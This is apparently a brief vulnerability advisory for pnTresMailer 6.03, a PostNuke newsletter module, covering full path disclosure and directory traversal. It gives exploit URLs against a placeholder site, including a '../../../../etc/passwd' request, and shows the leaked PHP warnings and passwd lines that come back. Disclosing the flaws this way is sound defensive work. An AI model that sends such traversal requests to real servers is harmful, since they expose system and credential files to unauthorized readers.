|
|
| |
"pnTresMailer is an advanced Newsletter module for use with the PostNuke content management system."
pnTresMailer is vulnerable to full path disclosure and directory traversal attacks which enable the user to retrieve any file remotely. |
| |
Credit:
The information has been provided by John Cobb.
|
| |
Vulnerable Systems:
* pnTresMailer version 6.03
While performing an invalid request an attacker is able to learn the location of the pnTresMailer in the filesystem by the error message returned from PHP. An example follows:
www.victimsite.com/codebrowserpntm.php?foldertohighlight=pnTresMailer&filetohighlight=w00t
Warning: highlight_file(codebrowserPnTM/pnTresMailer/w00t): failed to open
stream: No such file or directory in
/var/www/html/codebrowserpntm.php on line 130
Warning: highlight_file(): Failed opening
'codebrowserPnTM/pnTresMailer/w00t' for highlighting in
/var/www/html/codebrowserpntm.php on line 130
In addition, due to input validation bugs or lack thereof it is possible to provide relative paths in certain arguments and thus retrieve system files otherwise unaccessible. An interesting example would be to retrieve the password file:
www.victimsite.com/codebrowserpntm.php?downloadfolder=pnTresMailer&filetodownload=../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
|
|
|
